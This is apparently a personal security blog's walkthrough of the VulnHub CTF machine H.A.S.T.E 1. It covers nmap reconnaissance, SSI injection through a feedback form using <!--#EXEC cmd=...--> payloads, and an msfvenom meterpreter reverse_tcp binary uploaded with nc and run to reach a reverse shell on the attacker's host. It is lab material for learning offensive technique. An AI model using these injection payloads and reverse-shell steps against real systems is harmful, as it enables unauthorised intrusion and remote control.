Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

H.A.S.T.E 1: CTF walkthrough

Yesterday (14th October 2017) my leet guys, @ch3rn0byl and @H4v0k, decided to begin a new VulnHub VM, despite the late hour, I followed them.

I learned a new attack vector: SSI injection. Thanks.

Timeline:
ch3rn0byl: we just started the haste one if you want to do it (00:28)
[..snip..]
H4v0k: boot it up amon , sleep is for the weak (00:31)
ch3rn0byl: sleep is for the bitchesssssss (00:32)
[..snip..]
ch3rn0byl: fucking haste (02:38)

Note, if you want to learn more about windows exploit development you can read the ch3rn0byl’s blog: here.

 

Introduction

Name: H.A.S.T.E: 1
Date release: 13 Sep 2017

Author: f1re_w1re
Series: H.A.S.T.E
Web page: https://securityshards.wordpress.com/2017/09/13/new-h-a-s-t-e-hacking-challenge/

Aim: get any kind of shell in the system.

 

Recognition

We can find the IP address of the system with arp-scan.

haste_1_ctf_walkthrough_arp_scan.png

Nmap find only one port open, the port 80.

That will be a full web CTF.

root@kali:~/Desktop# nmap 192.168.1.46

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:38 CEST
Nmap scan report for yoda.home (192.168.1.46)
Host is up (0.029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)

Nmap done: 1 IP address (1 host up) scanned in 61.85 seconds
root@kali:~/Desktop#
 

Website analyse

With a quick enumeration of the structure of the website we can find an SSI page where an ls command is executed and different pages with the .shtml extension. If you google shtml on google you will find interesting documents and one attack vector.

Due to a non sanitised input in the HTTP form we can execute commands on the system.

Request Body:
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

xxx=Offsec&feedback=<!--#EXEC cmd="whoami; id; pwd" -->
haste_1_ctf_walkthrough_ssi_remote_command_injection.png
haste_1_ctf_walkthrough_ssi_remote_command_response.png

Note, the normal way to execute a command with SSI injection is to use the exec keyword instead of EXEC but after few try the exec string seems to be remove after the form validation, in the PHP page.

 

From RCE to reverse shell

As usual, we generate a reverse shell with msfvenom.

root@kali:~/Desktop# msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
root@kali:~/Desktop#

Then, we upload the reverse shell into the system.

#Attacker command
nc -nvv 192.168.1.46 1337 < rshell

#SSI injection command
<!--#EXEC cmd="/bin/nc -lvvp 1337 > /tmp/rshell" -->

We configure our meterpreter listener.

root@kali:~/Desktop# msfconsole -q 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.107:1337 
msf exploit(handler) >

We change the permission and we execute the reverse shell.

#Set permission to executable
<!--#EXEC cmd="chmod +x /tmp/rshell" -->

#Execute the reverse shell
<!--#EXEC cmd="/tmp/rshell" -->
haste_1_ctf_walkthrough_low_priv_reverse_shell.png
 
 

break